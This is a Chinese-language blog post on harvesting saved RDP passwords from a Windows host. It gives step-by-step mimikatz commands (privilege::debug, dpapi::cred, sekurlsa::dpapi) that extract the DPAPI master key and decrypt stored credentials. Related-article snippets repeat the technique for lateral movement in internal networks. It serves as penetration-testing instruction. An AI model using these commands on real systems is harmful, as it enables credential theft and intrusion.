获取远程主机rdp凭证

最新推荐文章于 2024-05-18 10:43:35 发布
最新推荐文章于 2024-05-18 10:43:35 发布
阅读量348 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31812157/article/details/130820645
版权

当我们远程桌面连接的时候rdp会保存在凭证里

cmdkey /list会看到凭证

我们的凭证存储在C:\Users\<username>\AppData\Local\Microsoft\Credentials\

mimikatz执行以下命令

mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\kaeiy\AppData\Local\Microsoft\Credentials\7AE15DF3D771BCB19CF01F7AA56EBF2A"

其中pData是加密的数据, guidMasterKey是凭据的GUID

记住guidMasterKey执行以下命令

mimikatz privilege::debug sekurlsa::dpapi

找到刚才GUID对应的MasterKey,这个就是pData的加密秘钥

mimikatz拿获取的MasterKey进行解密

mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\kaeiy\AppData\Local\Microsoft\Credentials\7AE15DF3D771BCB19CF01F7AA56EBF2A /masterkey:1986336c349d682060a33000e60fde50808168fd78734b71d5b866007352284793c3eaad3b4b9d3f83cc32049d3997e15885fd217c2ca57ae3113519d3320e86"

K0e1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
内网渗透-Windows RDP凭证的抓取和密码破解测试的方法
lza20001103的博客
09-02 1485
Windows RDP凭证的抓取和密码破解【密码抓取和爆破】 文章目录Windows RDP凭证的抓取和密码破解【密码抓取和爆破】破解原理凭证的查看查看凭证命令在线破离线破解 破解原理 Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程
Windows远程桌面 RDP Wrapper 配置文件
02-14
win1022H2系统,适用于10.0.19041.2075
RDP远程桌面密码凭证获取
LuckySec
10-19 5297
在渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。
android RDP远程桌面客户端源码
02-17
基于最新的FreeRDP开源,已整合最简,.so资源已封装,基于RDP协议的android手机可连接电脑远程桌面的客户端,整套源码经测试可用。项目import置入eclipse无报错! 1)支持Android 2.2(含)以上系统 2)支持RDP协议 3)支持Windows2008 RemoteApp,实现应用交付功能 4)支持远程桌面自定义分辨率,并能自适应手机屏幕全屏显示 5)支持放大、缩小等基本手势操作 6)支持屏幕旋转 7)支持虚拟键盘,支持Windows键和Ctrl+Alt+Del功能键以及其他键,支持虚拟鼠标右键 8)可保存多条远程桌面连接设置,用户可通过点击连接配置项直接建立远程桌面连接,配置可编辑修改 由于不搞android了,分享出来,供大家学习!
内网渗透神器(Mimikatz)——使用教程
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
利用mimikatz查看rdp连接密码【渗透测试】
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 9965
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
获取主机RDP连接凭据
yy
02-09 1094
为了避免每次连接服务器都进行身份验证,经常使用RDP的用户可能勾选保存连接凭据,以便进行快速的身份验证。使用找到的Masterkey的值破解指定的凭据文件6A538A1931101CE75C0D949EF75C9CDC,如下成功破解,得到rdp明文。得到的pbData就是凭据的加密数据,guidMasterKey是该凭据的GUID,记录guidMasterKey的值。如下,Credentials目录下保存了一个历史连接凭据,但其中的凭据是加密的。获取rdp加密凭据中的guidMasterKey值。
内网渗透:利用mimikatz查看rdp/3389连接密码
weixin_45612728的博客
01-29 3332
在做内网渗透的时候,往往有的时候如果能得到远程rdp连接密码,做起横向渗透或者纵向渗透更加容易拿到shell.rdp的密码为什么会被保存起来呢?是因为管理员的在连接的时候对信息凭据进行保存,所以会保存到本地的计算机当中,从而我们可以使用minikatz来进行读取密码的信息. 首先使用cmdkey /list来查看是否有保存的凭据密码信息. 2.使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials* 来查看保存凭据的目录和凭据的值.
【Windows远程桌面】RDP Wrapper 配置文件更新脚本
11-05
简介:由于 RDP Wrapper 多年未更新,自带的配置文件不支持新版本的远程桌面服务。因此我们只需更新配置文件即可。 用途:一键解决 RDP Wrapper 提示 Not listening [not supported] 的问题。 使用方法:...
远程桌面RDP源代码.rar
08-21
微软rdp远程桌面协议实现例子。 可自行修改丰富RDP远程桌面客户端
RDP远程桌面,用于远程桌面快速开发
05-10
RDP远程桌面,用于远程桌面快速开发
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
qq_53058639的博客
08-20 760
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
win10远程桌面_配置好win10远程桌面连接,在家中就可以摇控办公室电脑,太爽了...
weixin_39839541的博客
11-18 959
远程桌面连接是一种使用户能够坐在一台计算机前连接到其他位置的“远程计算机”的技术。例如,用户可以从家庭计算机连接到工作计算机,并访问所有程序、文件和网络资源,就好像坐在工作计算机前一样。另外,用户可以让程序在工作计算机上运行,然后当自己回到家时,也可以在家庭计算机上看见工作计算机的桌面以及那些正在运行的程序。一、开启本地的远程桌面通过远程桌面连接,用户在家中就可以轻松控制公司或其他场所的计算机,这...
服务器有的电脑可以远程有的电脑凭据不对,远程控制凭据不可用?
weixin_34208400的博客
07-30 899
腾讯视频/爱奇艺/优酷/外卖 充值4折起方法一:查看服务器的“计算机名”,如下图所示:查看方法:桌面计算机图标右击选择“属性”。本机输入用户名时候先输入计算机名,再输入用户名以后即可正常登陆。即以下格式:“服务器计算机名”+“”+“用户名 ”。如下图:若服务器是加入网络域的,输入域名。方法二:组策略编辑器设置身份验证1.打开组策略编辑器找到开始--- 运行-- 输入 gpedit.msc,打开注册...
远程桌面-【凭据不工作】
小花生编程
11-28 1286
远程桌面可能会出现系统提示“您的凭据不工作”。 问题现象是:远程主机已经开启了远程桌面,总是提示“您的凭证不工作”的情况,实际远程的用户名和密码都是正常的。 工具/原料 •Win8.1系统 方法一:组策略编辑器设置身份验证 1.打开组策略编辑器 •快捷键【WIN+X】—>【运行】—>【输入gpedit.msc】,打开注册表编辑器 ...
win10远程桌面连接凭据怎么设置_win10系统连接远程桌面提示你的凭据不工作的解决方法...
weixin_29648175的博客
01-30 6627
无论谁在使用电脑的时候都可能会发现连接远程桌面提示你的凭据不工作的问题,连接远程桌面提示你的凭据不工作让用户们很苦恼,这是怎么回事呢,连接远程桌面提示你的凭据不工作有什么简便的处理方式呢,其实只要依照在Windows10系统桌面,右键点击桌面左下角的开始按钮,在弹出菜单中选择“运行”菜单项。在打开的运行窗口中输入命令gpedit.msc,然后点击确定按钮。很容易就能搞定了,下面就给大家讲解一下连接...
Windows 远程连接记录获取
03-10 5986
简介 远程连接时,会将远程服务器的用户名和密码保存在本地的,所有可以通过解析相关文件,解密出相关凭证 本地获取 使用以下命令就可以查看本地保存的凭证,每个文件都是对应的一个远程连接的密码 dir /a %userprofile%\AppData\Local\Microsoft\Credentials\ mimikatz使用以下命令 privilege::debug dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Crede
[图解]SysML和EA建模住宅安全系统-05
最新发布
rolt的专栏
05-18 651
作用就是定义属性之间的数学关系
远程桌面rdp不能粘贴文本
07-15
远程桌面RDP不能粘贴文本的原因可能有多种。以下是一些可能的解决方法: 1. 检查远程桌面设置:确保在远程桌面连接中启用了“本地资源”选项,并选中“剪贴板”复选框。 2. 检查剪贴板服务:在远程计算机上,确保“剪贴板”服务正在运行。 3. 尝试使用键盘快捷键:在远程桌面中,使用键盘快捷键(如Ctrl+C和Ctrl+V)来复制和粘贴文本。 4. 尝试使用第三方工具:考虑使用第三方工具(如Remote Desktop Connection Manager)来连接远程桌面,这些工具可能会更好地支持剪贴板功能。 如果以上方法都无法解决问题,可以尝试搜索相关的技术论坛或咨询技术支持人员以获取更多帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值